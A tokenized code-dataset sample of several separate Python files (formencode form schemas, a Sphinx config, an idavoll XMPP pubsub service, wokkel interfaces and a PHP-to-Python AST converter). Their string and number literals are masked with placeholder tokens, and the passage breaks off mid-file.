<s> import formencode <EOL> import pylons <EOL> from pylons import app_globals as g <EOL> class OutputSchema ( formencode . Schema ) : <EOL> allow_extra_fields = False <EOL> enabled = formencode . validators . Int ( ) <EOL> class ConfigForm ( formencode . Schema ) : <EOL> allow_extra_fields = True <EOL> filter_extra_fields = True <EOL> action = formencode . validators . String ( not_empty = False , if_missing = None ) <EOL> cancel = formencode . validators . String ( not_empty = False , if_missing = None ) <EOL> firsttime = formencode . validators . Int ( not_empty = False , if_missing = <NUM_LIT:0> ) <EOL> server = formencode . validators . String ( strip = True , not_empty = True , messages = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> port = formencode . validators . Int ( strip = True , not_empty = True , messages = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> password = formencode . validators . String ( not_empty = False , if_missing = None ) <EOL> webpassword = formencode . validators . String ( not_empty = False , if_missing = None ) <EOL> timeout = formencode . validators . Bool ( ) <EOL> default_search = formencode . validators . String ( not_empty = True ) <EOL> awskey = formencode . validators . String ( strip = True , not_empty = False , if_missing = None ) <EOL> aws_secret = formencode . validators . String ( strip = True , not_empty = False , if_missing = None ) <EOL> outputs = formencode . ForEach ( OutputSchema ( ) , if_missing = [ ] ) <EOL> class StreamNameInUse ( formencode . validators . FancyValidator ) : <EOL> def validate_python ( self , values , state ) : <EOL> if values [ '<STR_LIT>' ] : <EOL> return <EOL> if values [ '<STR_LIT:name>' ] in [ name [ <NUM_LIT:0> ] for name in g . tc . streams ] : <EOL> raise formencode . Invalid ( { '<STR_LIT>' : "<STR_LIT>" } , values , state ) <EOL> class StreamForm ( formencode . Schema ) : <EOL> allow_extra_fields = False <EOL> name = formencode . validators . String ( not_empty = True , strip = True , messages = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> url = formencode . validators . URL ( not_empty = True , require_tld = False , strip = True , check_exists = False , messages = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> oldname = formencode . validators . String ( not_empty = False ) <EOL> chained_validators = [ StreamNameInUse ( ) ] <EOL> class State ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ** kw ) : <EOL> for key in kw : <EOL> setattr ( self , key , kw [ key ] ) <EOL> def __repr__ ( self ) : <EOL> atts = [ ] <EOL> for key in self . __dict__ : <EOL> atts . append ( ( key , getattr ( self , key ) ) ) <EOL> return self . __class__ . __name__ + '<STR_LIT:(>' + '<STR_LIT:U+002CU+0020>' . join ( x [ <NUM_LIT:0> ] + '<STR_LIT:=>' + repr ( x [ <NUM_LIT:1> ] ) for x in atts ) + '<STR_LIT:)>' <EOL> def validate_custom ( schema , ** state_kwargs ) : <EOL> """<STR_LIT>""" <EOL> if state_kwargs : <EOL> state = State ( ** state_kwargs ) <EOL> else : <EOL> state = None <EOL> if state_kwargs . get ( '<STR_LIT>' , False ) : <EOL> params = formencode . variabledecode . variable_decode ( pylons . request . params ) <EOL> print pylons . request . params <EOL> print params <EOL> else : <EOL> params = pylons . request . params <EOL> return schema . to_python ( params , state ) <EOL> def htmlfill ( html , exception_error = None ) : <EOL> """<STR_LIT>""" <EOL> return formencode . htmlfill . render ( <EOL> form = html , <EOL> defaults = pylons . request . params , <EOL> errors = ( exception_error and exception_error . unpack_errors ( ) ) , <EOL> encoding = pylons . response . determine_charset ( ) <EOL> ) </s>
<s> import sys <EOL> import os <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . abspath ( '<STR_LIT:..>' ) ) <EOL> extensions = [ <EOL> '<STR_LIT>' , <EOL> ] <EOL> templates_path = [ '<STR_LIT>' ] <EOL> source_suffix = '<STR_LIT>' <EOL> master_doc = '<STR_LIT:index>' <EOL> project = u'<STR_LIT>' <EOL> copyright = u'<STR_LIT>' <EOL> version = '<STR_LIT>' <EOL> release = '<STR_LIT>' <EOL> exclude_patterns = [ '<STR_LIT>' ] <EOL> pygments_style = '<STR_LIT>' <EOL> html_theme = '<STR_LIT:default>' <EOL> html_static_path = [ '<STR_LIT>' ] <EOL> htmlhelp_basename = '<STR_LIT>' <EOL> latex_elements = { <EOL> } <EOL> latex_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> man_pages = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> [ u'<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> ] <EOL> autoclass_content = '<STR_LIT>' <EOL> texinfo_documents = [ <EOL> ( '<STR_LIT:index>' , '<STR_LIT>' , u'<STR_LIT>' , <EOL> u'<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> on_rtd = os . environ . get ( '<STR_LIT>' , None ) == '<STR_LIT:True>' <EOL> if not on_rtd : <EOL> import sphinx_rtd_theme <EOL> html_theme = '<STR_LIT>' <EOL> html_theme_path = [ sphinx_rtd_theme . get_html_theme_path ( ) ] </s>
<s> from twisted . application import service <EOL> from twisted . python import usage <EOL> from twisted . words . protocols . jabber . jid import JID <EOL> from wokkel . component import Component <EOL> from wokkel . disco import DiscoHandler <EOL> from wokkel . generic import FallbackHandler , VersionHandler <EOL> from wokkel . iwokkel import IPubSubResource <EOL> from wokkel . pubsub import PubSubService <EOL> from idavoll import __version__ <EOL> from idavoll . backend import BackendService <EOL> class Options ( usage . Options ) : <EOL> optParameters = [ <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT:127.0.0.1>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' ) , <EOL> ] <EOL> optFlags = [ <EOL> ( '<STR_LIT>' , '<STR_LIT:v>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , None , '<STR_LIT>' ) <EOL> ] <EOL> def postOptions ( self ) : <EOL> if self [ '<STR_LIT>' ] not in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise usage . UsageError , "<STR_LIT>" <EOL> self [ '<STR_LIT>' ] = JID ( self [ '<STR_LIT>' ] ) <EOL> def makeService ( config ) : <EOL> s = service . MultiService ( ) <EOL> if config [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> from twisted . enterprise import adbapi <EOL> from idavoll . pgsql_storage import Storage <EOL> from psycopg2 . extras import NamedTupleConnection <EOL> dbpool = adbapi . ConnectionPool ( '<STR_LIT>' , <EOL> user = config [ '<STR_LIT>' ] , <EOL> password = config [ '<STR_LIT>' ] , <EOL> database = config [ '<STR_LIT>' ] , <EOL> host = config [ '<STR_LIT>' ] , <EOL> port = config [ '<STR_LIT>' ] , <EOL> cp_reconnect = True , <EOL> client_encoding = '<STR_LIT:utf-8>' , <EOL> connection_factory = NamedTupleConnection , <EOL> ) <EOL> st = Storage ( dbpool ) <EOL> elif config [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> from idavoll . memory_storage import Storage <EOL> st = Storage ( ) <EOL> bs = BackendService ( st ) <EOL> bs . setName ( '<STR_LIT>' ) <EOL> bs . setServiceParent ( s ) <EOL> cs = Component ( config [ "<STR_LIT>" ] , int ( config [ "<STR_LIT>" ] ) , <EOL> config [ "<STR_LIT>" ] . full ( ) , config [ "<STR_LIT>" ] ) <EOL> cs . setName ( '<STR_LIT>' ) <EOL> cs . setServiceParent ( s ) <EOL> cs . factory . maxDelay = <NUM_LIT> <EOL> if config [ "<STR_LIT>" ] : <EOL> cs . logTraffic = True <EOL> FallbackHandler ( ) . setHandlerParent ( cs ) <EOL> VersionHandler ( '<STR_LIT>' , __version__ ) . setHandlerParent ( cs ) <EOL> DiscoHandler ( ) . setHandlerParent ( cs ) <EOL> resource = IPubSubResource ( bs ) <EOL> resource . hideNodes = config [ "<STR_LIT>" ] <EOL> resource . serviceJID = config [ "<STR_LIT>" ] <EOL> ps = PubSubService ( resource ) <EOL> ps . setHandlerParent ( cs ) <EOL> resource . pubsubService = ps <EOL> return s </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> from zope . interface import Interface <EOL> from twisted . python . deprecate import deprecatedModuleAttribute <EOL> from twisted . python . versions import Version <EOL> from twisted . words . protocols . jabber . ijabber import IXMPPHandler <EOL> from twisted . words . protocols . jabber . ijabber import IXMPPHandlerCollection <EOL> deprecatedModuleAttribute ( <EOL> Version ( "<STR_LIT>" , <NUM_LIT:0> , <NUM_LIT:7> , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" , <EOL> __name__ , <EOL> "<STR_LIT>" ) <EOL> deprecatedModuleAttribute ( <EOL> Version ( "<STR_LIT>" , <NUM_LIT:0> , <NUM_LIT:7> , <NUM_LIT:0> ) , <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> __name__ , <EOL> "<STR_LIT>" ) <EOL> class IDisco ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def getDiscoInfo ( requestor , target , nodeIdentifier = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> def getDiscoItems ( requestor , target , nodeIdentifier = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> class IPubSubClient ( Interface ) : <EOL> def itemsReceived ( event ) : <EOL> """<STR_LIT>""" <EOL> def deleteReceived ( event ) : <EOL> """<STR_LIT>""" <EOL> def purgeReceived ( event ) : <EOL> """<STR_LIT>""" <EOL> def createNode ( service , nodeIdentifier = None ) : <EOL> """<STR_LIT>""" <EOL> def deleteNode ( service , nodeIdentifier ) : <EOL> """<STR_LIT>""" <EOL> def subscribe ( service , nodeIdentifier , subscriber ) : <EOL> """<STR_LIT>""" <EOL> def unsubscribe ( service , nodeIdentifier , subscriber ) : <EOL> """<STR_LIT>""" <EOL> def publish ( service , nodeIdentifier , items = [ ] ) : <EOL> """<STR_LIT>""" <EOL> class IPubSubService ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def notifyPublish ( service , nodeIdentifier , notifications ) : <EOL> """<STR_LIT>""" <EOL> def notifyDelete ( service , nodeIdentifier , subscribers , <EOL> redirectURI = None ) : <EOL> """<STR_LIT>""" <EOL> def publish ( requestor , service , nodeIdentifier , items ) : <EOL> """<STR_LIT>""" <EOL> def subscribe ( requestor , service , nodeIdentifier , subscriber ) : <EOL> """<STR_LIT>""" <EOL> def unsubscribe ( requestor , service , nodeIdentifier , subscriber ) : <EOL> """<STR_LIT>""" <EOL> def subscriptions ( requestor , service ) : <EOL> """<STR_LIT>""" <EOL> def affiliations ( requestor , service ) : <EOL> """<STR_LIT>""" <EOL> def create ( requestor , service , nodeIdentifier ) : <EOL> """<STR_LIT>""" <EOL> def getConfigurationOptions ( ) : <EOL> """<STR_LIT>""" <EOL> def getDefaultConfiguration ( requestor , service , nodeType ) : <EOL> """<STR_LIT>""" <EOL> def getConfiguration ( requestor , service , nodeIdentifier ) : <EOL> """<STR_LIT>""" <EOL> def setConfiguration ( requestor , service , nodeIdentifier , options ) : <EOL> """<STR_LIT>""" <EOL> def items ( requestor , service , nodeIdentifier , maxItems , itemIdentifiers ) : <EOL> """<STR_LIT>""" <EOL> def retract ( requestor , service , nodeIdentifier , itemIdentifiers ) : <EOL> """<STR_LIT>""" <EOL> def purge ( requestor , service , nodeIdentifier ) : <EOL> """<STR_LIT>""" <EOL> def delete ( requestor , service , nodeIdentifier ) : <EOL> """<STR_LIT>""" <EOL> class IPubSubResource ( Interface ) : <EOL> def locateResource ( request ) : <EOL> """<STR_LIT>""" <EOL> def getInfo ( requestor , service , nodeIdentifier ) : <EOL> """<STR_LIT>""" <EOL> def getNodes ( requestor , service , nodeIdentifier ) : <EOL> """<STR_LIT>""" <EOL> def getConfigurationOptions ( ) : <EOL> """<STR_LIT>""" <EOL> def publish ( request ) : <EOL> """<STR_LIT>""" <EOL> def subscribe ( request ) : <EOL> """<STR_LIT>""" <EOL> def unsubscribe ( request ) : <EOL> """<STR_LIT>""" <EOL> def subscriptions ( request ) : <EOL> """<STR_LIT>""" <EOL> def affiliations ( request ) : <EOL> """<STR_LIT>""" <EOL> def create ( request ) : <EOL> """<STR_LIT>""" <EOL> def default ( request ) : <EOL> """<STR_LIT>""" <EOL> def configureGet ( request ) : <EOL> """<STR_LIT>""" <EOL> def configureSet ( request ) : <EOL> """<STR_LIT>""" <EOL> def items ( request ) : <EOL> """<STR_LIT>""" <EOL> def retract ( request ) : <EOL> """<STR_LIT>""" <EOL> def purge ( request ) : <EOL> """<STR_LIT>""" <EOL> def delete ( request ) : <EOL> """<STR_LIT>""" <EOL> def affiliationsGet ( request ) : <EOL> """<STR_LIT>""" <EOL> def affiliationsSet ( request ) : <EOL> """<STR_LIT>""" <EOL> class IMUCClient ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def receivedSubject ( room , user , subject ) : <EOL> """<STR_LIT>""" <EOL> def receivedHistory ( room , user , message ) : <EOL> """<STR_LIT>""" <EOL> def configure ( roomJID , options ) : <EOL> """<STR_LIT>""" <EOL> def getConfiguration ( roomJID ) : <EOL> """<STR_LIT>""" <EOL> def join ( roomJID , nick , historyOptions = None , password = None ) : <EOL> """<STR_LIT>""" <EOL> def nick ( roomJID , nick ) : <EOL> """<STR_LIT>""" <EOL> def leave ( roomJID ) : <EOL> """<STR_LIT>""" <EOL> def userJoinedRoom ( room , user ) : <EOL> """<STR_LIT>""" <EOL> def groupChat ( roomJID , body ) : <EOL> """<STR_LIT>""" <EOL> def chat ( occupantJID , body ) : <EOL> """<STR_LIT>""" <EOL> def register ( roomJID , options ) : <EOL> """<STR_LIT>""" <EOL> def subject ( roomJID , subject ) : <EOL> """<STR_LIT>""" <EOL> def voice ( roomJID ) : <EOL> """<STR_LIT>""" <EOL> def history ( roomJID , messages ) : <EOL> """<STR_LIT>""" <EOL> def ban ( roomJID , entity , reason = None , sender = None ) : <EOL> """<STR_LIT>""" <EOL> def kick ( roomJID , nick , reason = None , sender = None ) : <EOL> """<STR_LIT>""" <EOL> class IMUCStatuses ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def __contains__ ( key ) : <EOL> """<STR_LIT>""" <EOL> def __iter__ ( ) : <EOL> """<STR_LIT>""" <EOL> def __len__ ( ) : <EOL> """<STR_LIT>""" </s>
<s> import phpast as php <EOL> import ast as py <EOL> unary_ops = { <EOL> '<STR_LIT>' : py . Invert , <EOL> '<STR_LIT:!>' : py . Not , <EOL> '<STR_LIT:+>' : py . UAdd , <EOL> '<STR_LIT:->' : py . USub , <EOL> } <EOL> bool_ops = { <EOL> '<STR_LIT>' : py . And , <EOL> '<STR_LIT>' : py . Or , <EOL> '<STR_LIT>' : py . And , <EOL> '<STR_LIT>' : py . Or , <EOL> } <EOL> cmp_ops = { <EOL> '<STR_LIT>' : py . NotEq , <EOL> '<STR_LIT>' : py . NotEq , <EOL> '<STR_LIT>' : py . NotEq , <EOL> '<STR_LIT:<>' : py . Lt , <EOL> '<STR_LIT>' : py . LtE , <EOL> '<STR_LIT>' : py . Eq , <EOL> '<STR_LIT>' : py . Eq , <EOL> '<STR_LIT:>>' : py . Gt , <EOL> '<STR_LIT>' : py . GtE , <EOL> } <EOL> binary_ops = { <EOL> '<STR_LIT:+>' : py . Add , <EOL> '<STR_LIT:->' : py . Sub , <EOL> '<STR_LIT:*>' : py . Mult , <EOL> '<STR_LIT:/>' : py . Div , <EOL> '<STR_LIT:%>' : py . Mod , <EOL> '<STR_LIT>' : py . LShift , <EOL> '<STR_LIT>' : py . RShift , <EOL> '<STR_LIT:|>' : py . BitOr , <EOL> '<STR_LIT:&>' : py . BitAnd , <EOL> '<STR_LIT>' : py . BitXor , <EOL> } <EOL> casts = { <EOL> '<STR_LIT>' : '<STR_LIT:float>' , <EOL> '<STR_LIT:string>' : '<STR_LIT:str>' , <EOL> '<STR_LIT>' : '<STR_LIT:list>' , <EOL> } <EOL> def to_stmt ( pynode ) : <EOL> if not isinstance ( pynode , py . stmt ) : <EOL> pynode = py . Expr ( pynode , <EOL> lineno = pynode . lineno , <EOL> col_offset = pynode . col_offset ) <EOL> return pynode <EOL> def from_phpast ( node ) : <EOL> if node is None : <EOL> return py . Pass ( ** pos ( node ) ) <EOL> if isinstance ( node , basestring ) : <EOL> return py . Str ( node , ** pos ( node ) ) <EOL> if isinstance ( node , ( int , float ) ) : <EOL> return py . Num ( node , ** pos ( node ) ) <EOL> if isinstance ( node , php . Array ) : <EOL> if node . nodes : <EOL> if node . nodes [ <NUM_LIT:0> ] . key is not None : <EOL> keys = [ ] <EOL> values = [ ] <EOL> for elem in node . nodes : <EOL> keys . append ( from_phpast ( elem . key ) ) <EOL> values . append ( from_phpast ( elem . value ) ) <EOL> return py . Dict ( keys , values , ** pos ( node ) ) <EOL> else : <EOL> return py . List ( [ from_phpast ( x . value ) for x in node . nodes ] , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> else : <EOL> return py . List ( [ ] , py . Load ( ** pos ( node ) ) , ** pos ( node ) ) <EOL> if isinstance ( node , php . InlineHTML ) : <EOL> args = [ py . Str ( node . data , ** pos ( node ) ) ] <EOL> return py . Call ( py . Name ( '<STR_LIT>' , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> args , [ ] , None , None , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . Echo ) : <EOL> return py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> map ( from_phpast , node . nodes ) , <EOL> [ ] , None , None , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . Print ) : <EOL> return py . Print ( None , [ from_phpast ( node . node ) ] , True , ** pos ( node ) ) <EOL> if isinstance ( node , php . Exit ) : <EOL> args = [ ] <EOL> if node . expr is not None : <EOL> args . append ( from_phpast ( node . expr ) ) <EOL> return py . Raise ( py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> args , [ ] , None , None , ** pos ( node ) ) , <EOL> None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . Return ) : <EOL> if node . node is None : <EOL> return py . Return ( None , ** pos ( node ) ) <EOL> else : <EOL> return py . Return ( from_phpast ( node . node ) , ** pos ( node ) ) <EOL> if isinstance ( node , php . Break ) : <EOL> assert node . node is None , '<STR_LIT>' <EOL> return py . Break ( ** pos ( node ) ) <EOL> if isinstance ( node , php . Continue ) : <EOL> assert node . node is None , '<STR_LIT>' <EOL> return py . Continue ( ** pos ( node ) ) <EOL> if isinstance ( node , php . Silence ) : <EOL> return from_phpast ( node . expr ) <EOL> if isinstance ( node , php . Block ) : <EOL> return from_phpast ( php . If ( <NUM_LIT:1> , node , [ ] , None , lineno = node . lineno ) ) <EOL> if isinstance ( node , php . Unset ) : <EOL> return py . Delete ( map ( from_phpast , node . nodes ) , ** pos ( node ) ) <EOL> if isinstance ( node , php . IsSet ) and len ( node . nodes ) == <NUM_LIT:1> : <EOL> if isinstance ( node . nodes [ <NUM_LIT:0> ] , php . ArrayOffset ) : <EOL> return py . Compare ( from_phpast ( node . nodes [ <NUM_LIT:0> ] . expr ) , <EOL> [ py . In ( ** pos ( node ) ) ] , <EOL> [ from_phpast ( node . nodes [ <NUM_LIT:0> ] . node ) ] , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node . nodes [ <NUM_LIT:0> ] , php . ObjectProperty ) : <EOL> return py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ from_phpast ( node . nodes [ <NUM_LIT:0> ] . node ) , <EOL> from_phpast ( node . nodes [ <NUM_LIT:0> ] . name ) ] , <EOL> [ ] , None , None , ** pos ( node ) ) <EOL> if isinstance ( node . nodes [ <NUM_LIT:0> ] , php . Variable ) : <EOL> return py . Compare ( py . Str ( node . nodes [ <NUM_LIT:0> ] . name [ <NUM_LIT:1> : ] , ** pos ( node ) ) , <EOL> [ py . In ( ** pos ( node ) ) ] , <EOL> [ py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ ] , [ ] , None , None , ** pos ( node ) ) ] , <EOL> ** pos ( node ) ) <EOL> return py . Compare ( from_phpast ( node . nodes [ <NUM_LIT:0> ] ) , <EOL> [ py . IsNot ( ** pos ( node ) ) ] , <EOL> [ py . Name ( '<STR_LIT:None>' , py . Load ( ** pos ( node ) ) , ** pos ( node ) ) ] , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . Empty ) : <EOL> return from_phpast ( php . UnaryOp ( '<STR_LIT:!>' , <EOL> php . BinaryOp ( '<STR_LIT>' , <EOL> php . IsSet ( [ node . expr ] , <EOL> lineno = node . lineno ) , <EOL> node . expr , <EOL> lineno = node . lineno ) , <EOL> lineno = node . lineno ) ) <EOL> if isinstance ( node , php . Assignment ) : <EOL> if ( isinstance ( node . node , php . ArrayOffset ) <EOL> and node . node . expr is None ) : <EOL> return py . Call ( py . Attribute ( from_phpast ( node . node . node ) , <EOL> '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ from_phpast ( node . expr ) ] , <EOL> [ ] , None , None , ** pos ( node ) ) <EOL> if ( isinstance ( node . node , php . ObjectProperty ) <EOL> and isinstance ( node . node . name , php . BinaryOp ) ) : <EOL> return to_stmt ( py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ from_phpast ( node . node . node ) , <EOL> from_phpast ( node . node . name ) , <EOL> from_phpast ( node . expr ) ] , <EOL> [ ] , None , None , ** pos ( node ) ) ) <EOL> return py . Assign ( [ store ( from_phpast ( node . node ) ) ] , <EOL> from_phpast ( node . expr ) , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . ListAssignment ) : <EOL> return py . Assign ( [ py . Tuple ( map ( store , map ( from_phpast , node . nodes ) ) , <EOL> py . Store ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) ] , <EOL> from_phpast ( node . expr ) , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . AssignOp ) : <EOL> return from_phpast ( php . Assignment ( node . left , <EOL> php . BinaryOp ( node . op [ : - <NUM_LIT:1> ] , <EOL> node . left , <EOL> node . right , <EOL> lineno = node . lineno ) , <EOL> False , <EOL> lineno = node . lineno ) ) <EOL> if isinstance ( node , ( php . PreIncDecOp , php . PostIncDecOp ) ) : <EOL> return from_phpast ( php . Assignment ( node . expr , <EOL> php . BinaryOp ( node . op [ <NUM_LIT:0> ] , <EOL> node . expr , <EOL> <NUM_LIT:1> , <EOL> lineno = node . lineno ) , <EOL> False , <EOL> lineno = node . lineno ) ) <EOL> if isinstance ( node , php . ArrayOffset ) : <EOL> return py . Subscript ( from_phpast ( node . node ) , <EOL> py . Index ( from_phpast ( node . expr ) , ** pos ( node ) ) , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . ObjectProperty ) : <EOL> if isinstance ( node . name , ( php . Variable , php . BinaryOp ) ) : <EOL> return py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ from_phpast ( node . node ) , <EOL> from_phpast ( node . name ) ] , <EOL> [ ] , None , None , ** pos ( node ) ) <EOL> return py . Attribute ( from_phpast ( node . node ) , <EOL> node . name , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . Constant ) : <EOL> name = node . name <EOL> if name . lower ( ) == '<STR_LIT:true>' : name = '<STR_LIT:True>' <EOL> if name . lower ( ) == '<STR_LIT:false>' : name = '<STR_LIT:False>' <EOL> if name . lower ( ) == '<STR_LIT:null>' : name = '<STR_LIT:None>' <EOL> return py . Name ( name , py . Load ( ** pos ( node ) ) , ** pos ( node ) ) <EOL> if isinstance ( node , php . Variable ) : <EOL> name = node . name [ <NUM_LIT:1> : ] <EOL> if name == '<STR_LIT>' : name = '<STR_LIT>' <EOL> return py . Name ( name , py . Load ( ** pos ( node ) ) , ** pos ( node ) ) <EOL> if isinstance ( node , php . Global ) : <EOL> return py . Global ( [ var . name [ <NUM_LIT:1> : ] for var in node . nodes ] , ** pos ( node ) ) <EOL> if isinstance ( node , php . Include ) : <EOL> once = py . Name ( '<STR_LIT:True>' if node . once else '<STR_LIT:False>' , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> return py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ from_phpast ( node . expr ) , once ] , <EOL> [ ] , None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . Require ) : <EOL> once = py . Name ( '<STR_LIT:True>' if node . once else '<STR_LIT:False>' , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> return py . Call ( py . Name ( '<STR_LIT>' , py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ from_phpast ( node . expr ) , once ] , <EOL> [ ] , None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . UnaryOp ) : <EOL> op = unary_ops . get ( node . op ) <EOL> assert op is not None , "<STR_LIT>" % node . op <EOL> op = op ( ** pos ( node ) ) <EOL> return py . UnaryOp ( op , from_phpast ( node . expr ) , ** pos ( node ) ) <EOL> if isinstance ( node , php . BinaryOp ) : <EOL> if node . op == '<STR_LIT:.>' : <EOL> pattern , pieces = build_format ( node . left , node . right ) <EOL> if pieces : <EOL> return py . BinOp ( py . Str ( pattern , ** pos ( node ) ) , <EOL> py . Mod ( ** pos ( node ) ) , <EOL> py . Tuple ( map ( from_phpast , pieces ) , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> else : <EOL> return py . Str ( pattern % ( ) , ** pos ( node ) ) <EOL> if node . op in bool_ops : <EOL> op = bool_ops [ node . op ] ( ** pos ( node ) ) <EOL> return py . BoolOp ( op , [ from_phpast ( node . left ) , <EOL> from_phpast ( node . right ) ] , ** pos ( node ) ) <EOL> if node . op in cmp_ops : <EOL> op = cmp_ops [ node . op ] ( ** pos ( node ) ) <EOL> return py . Compare ( from_phpast ( node . left ) , [ op ] , <EOL> [ from_phpast ( node . right ) ] , <EOL> ** pos ( node ) ) <EOL> op = binary_ops . get ( node . op ) <EOL> assert op is not None , "<STR_LIT>" % node . op <EOL> op = op ( ** pos ( node ) ) <EOL> return py . BinOp ( from_phpast ( node . left ) , <EOL> op , <EOL> from_phpast ( node . right ) , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . TernaryOp ) : <EOL> return py . IfExp ( from_phpast ( node . expr ) , <EOL> from_phpast ( node . iftrue ) , <EOL> from_phpast ( node . iffalse ) , <EOL> ** pos ( node ) ) <EOL> if isinstance ( node , php . Cast ) : <EOL> return py . Call ( py . Name ( casts . get ( node . type , node . type ) , <EOL> py . Load ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) , <EOL> [ from_phpast ( node . expr ) ] , <EOL> [ ] , None , None , ** pos ( node ) ) <EOL> if isinstance ( node , php . If ) : <EOL> orelse = [ ] <EOL> if node . else_ : <EOL> for else_ in map ( from_phpast , deblock ( node . else_ . node ) ) : <EOL> orelse . append ( to_stmt ( else_ ) ) <EOL> for elseif in reversed ( node . elseifs ) : <EOL> orelse = [ py . If ( from_phpast ( elseif . expr ) , <EOL> map ( to_stmt , map ( from_phpast , deblock ( elseif . node ) ) ) , <EOL> orelse , ** pos ( node ) ) ] <EOL> return py . If ( from_phpast ( node . expr ) , <EOL> map ( to_stmt , map ( from_phpast , deblock ( node . node ) ) ) , <EOL> orelse , ** pos ( node ) ) <EOL> if isinstance ( node , php . For ) : <EOL> assert node . test is None or len ( node . test ) == <NUM_LIT:1> , '<STR_LIT>' <EOL> return from_phpast ( php . Block ( ( node . start or [ ] ) <EOL> + [ php . While ( node . test [ <NUM_LIT:0> ] if node . test else <NUM_LIT:1> , <EOL> php . Block ( deblock ( node . node ) <EOL> + ( node . count or [ ] ) , <EOL> lineno = node . lineno ) , <EOL> lineno = node . lineno ) ] , <EOL> lineno = node . lineno ) ) <EOL> if isinstance ( node , php . Foreach ) : <EOL> if node . keyvar is None : <EOL> target = py . Name ( node . valvar . name [ <NUM_LIT:1> : ] , py . Store ( ** pos ( node ) ) , <EOL> ** pos ( node ) ) <EOL> else : <EOL> target = py . Tuple ( [ py . Name ( node . keyvar . name [ <NUM_LIT:1> : ] , <EOL> py . Store ( ** pos ( node ) ) ) , <EOL> py . Name ( node . valvar . name [ <NUM_LIT:1> : ] , <EOL> py . Store ( ** pos ( node ) ) ) ] , <EOL> py . Store ( ** pos ( node ) ) , ** pos ( node ) ) <EOL> return py . For ( target , from_phpast ( node . expr ) , <EOL> map ( to_stmt 